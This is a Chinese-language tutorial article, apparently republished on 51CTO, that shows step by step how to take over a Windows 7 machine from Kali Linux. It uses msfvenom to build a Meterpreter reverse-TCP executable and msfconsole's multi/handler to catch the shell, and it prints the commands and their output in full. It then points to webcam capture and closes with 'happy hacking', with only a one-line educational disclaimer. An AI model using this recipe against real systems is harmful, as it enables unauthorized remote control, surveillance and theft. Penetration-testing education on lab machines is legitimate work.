自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

<label id="4ky0k"></label>

AI.x社區(qū)

軟考社區(qū)

企業(yè)培訓(xùn)

鴻蒙開發(fā)者社區(qū)

WOT技術(shù)大會

公眾號矩陣

移動端

視頻課免費課排行榜短視頻直播課軟考學(xué)堂

全部課程軟考華為認證廠商認證 IT技術(shù)PMP項目管理免費題庫

在線學(xué)習(xí)

文章資源問答課堂專欄直播

51CTO

鴻蒙開發(fā)者社區(qū)

51CTO技術(shù)棧

51CTO官微

51CTO學(xué)堂

51CTO博客

CTO訓(xùn)練營

鴻蒙開發(fā)者社區(qū)訂閱號

51CTO軟考

51CTO學(xué)堂APP

51CTO學(xué)堂企業(yè)版APP

鴻蒙開發(fā)者社區(qū)視頻號

51CTO軟考題庫

賬號設(shè)置退出

如何使用 Kali Linux 黑掉 Windows

作者：Manmohan Mirkar 2017-02-16 13:33:54

系統(tǒng) Linux 系統(tǒng)運維

Metasploit 項目中 Metasploit 框架支持 Kali Linux 平臺，Metasploit 是一個用于開發(fā)和執(zhí)行安全利用代碼security exploit的工具。

Kali Linux 派生自 Debian Linux，主要用于滲透測試，擁有超過 300 個的預(yù)安裝好的滲透測試工具。Metasploit 項目中 Metasploit 框架支持 Kali Linux 平臺，Metasploit 是一個用于開發(fā)和執(zhí)行安全利用代碼security exploit的工具。讓我們來使用 Kali Linux 來攻破 Windows 吧。請注意，我寫這篇文章只是出于教育目的哦——一切因此帶來的后果和本文作者、譯者無關(guān)。

源機器詳情

Kali Linux

root@kali:/# uname -a 
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux 
root@kali:/#

用做攻擊對象的目標機器：

Windows 7 Ultimate SP1

步驟 1：創(chuàng)建 Payload 程序

Payload 是一個類似于病毒或者木馬的程序，可以運行在遠程目標上 —— 為了黑掉那臺機器。可以通過以下命令來創(chuàng)建 Payload(program.exe)，以便能使用 Kali Linux 黑掉 Windows。

root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
No Arch selected, selecting Arch: x86 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 333 bytes 
Final size of exe file: 73802 bytes 
Saved as: /root/program.exe 
root@kali:/# ls -la /root/program.exe 
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe

通過 ls 命令，我們可以確認 Payload 程序是否成功生成在指定的位置。

步驟 2：運行 mfsconsole 命令啟動 msf 命令窗口

root@kali:# msfconsole 
                                   .,,.                  . 
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P 
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p 
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88' 
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P 
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b 
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b 
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88 
                          .a#$$$$$$"`          88b  d8P  88b`?8888P' 
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;: 
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$' 
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' 
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' 
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' 
_______________________________________________________________   ,&$$$$$$'_____ 
                                                                 ll&&$$$$' 
                                                              .;;lll&&&&' 
                                                            ...;;lllll&' 
                                                          ......;;;llll;;;.... 
                                                           ` ......;;;;... .  . 
Taking notes in notepad? Have Metasploit Pro track & report 
your progress and findings -- learn more on http://rapid7.com/metasploit 
       =[ metasploit v4.12.22-dev                         ] 
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ] 
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 
msf >

步驟 3：進行漏洞利用的細節(jié)

4444 端口：你可以按照自己的想法來選擇使用哪個端口
LHOST IP：表示 Kali Linux 機器的 IP，這里是 192.168.189.128。使用如下命令來查看你的 Kali Linux 機器的 IP。

root@kali:/# ip r l 
192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100 
root@kali:/#

現(xiàn)在在 msf 命令窗口使用 use exploit/multi/handler 命令，如下：

msf > use exploit/multi/handler 
msf exploit(handler) >

然后在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp：

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp

現(xiàn)在使用 LHOST 和 LPORT 來設(shè)置本地 IP 和本地端口，如下：

msf exploit(handler) > set lhost 192.168.189.128 
lhost => 192.168.189.128 
msf exploit(handler) > set lport 4444 
lport => 4444

最后使用 exploit 命令。

msf exploit(handler) > exploit 
[*] Started reverse TCP handler on 192.168.189.128:4444 
[*] Starting the payload handler...

現(xiàn)在你需要在 Windows 上運行 program.exe，一旦它在目標機器上執(zhí)行，你就可以建立一個 meterpreter 會話。輸入 sysinfo 就可以得到這臺被黑掉的 Windows 機器的詳情。

msf exploit(handler) > exploit 
[*] Started reverse TCP handler on 192.168.189.128:4444 
[*] Starting the payload handler... 
[*] Sending stage (957999 bytes) to 192.168.189.1 
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 
meterpreter > sysinfo 
Computer        : MANN-PC 
OS              : Windows 7 (Build 7601, Service Pack 1). 
Architecture    : x64 (Current Process is WOW64) 
System Language : en_IN 
Domain          : WORKGROUP 
Logged On Users : 2 
Meterpreter     : x86/win32

一旦你得到了這些詳細信息，就可以做更多的漏洞利用，或者通過 help 命令獲取更多信息，以便列出你可以黑掉該系統(tǒng)的所有選項，比如 webcam_snap 命令獲取網(wǎng)絡(luò)攝像頭，同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!!

責(zé)任編輯：武曉燕來源： Linux中國

Kali Linux Windows Metasploit

51CTO技術(shù)棧公眾號

業(yè)務(wù)
速覽

媒體

51CTO CIOAge HC3i

社區(qū)

51CTO博客鴻蒙開發(fā)者社區(qū) AI.x社區(qū)

教育

51CTO學(xué)堂精培企業(yè)培訓(xùn) CTO訓(xùn)練營

<sub id="x6isu"></sub>

^{<blockquote id="x6isu"></blockquote>}